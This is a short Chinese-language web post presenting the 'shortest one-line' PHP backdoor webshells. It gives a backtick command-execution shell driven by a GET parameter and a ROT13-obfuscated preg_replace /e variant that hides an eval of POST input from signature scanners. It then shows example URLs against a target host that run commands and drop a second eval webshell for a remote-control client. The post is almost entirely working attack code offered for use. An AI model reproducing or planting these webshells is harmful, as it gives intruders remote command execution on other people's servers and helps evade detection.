php最短一句话后门webshell

<?php
@`$_GET[c]`; //反引号执行
?>
preg_replace("//e",@str_rot13('@riny($_CBFG[p])'),"");  
//str_rot13('@riny($_CBFG[p])') == eval($_POST[c])
//字符串执行 ROT13 转换特征码,php version < 5.5.0 /e修饰符才可执行

  调用示例:

#生成当前目录列表dir.txt
http://target_host/webshell.php?c=dir%20>dir.txt 

#生成菜刀可调用的POST Shell
http://target_host/webshell.php?c=echo%20"<?php @eval($_POST[c]);>" > newshell.php

你可能感兴趣的:(PHP,webshell,一句话,反引号后门)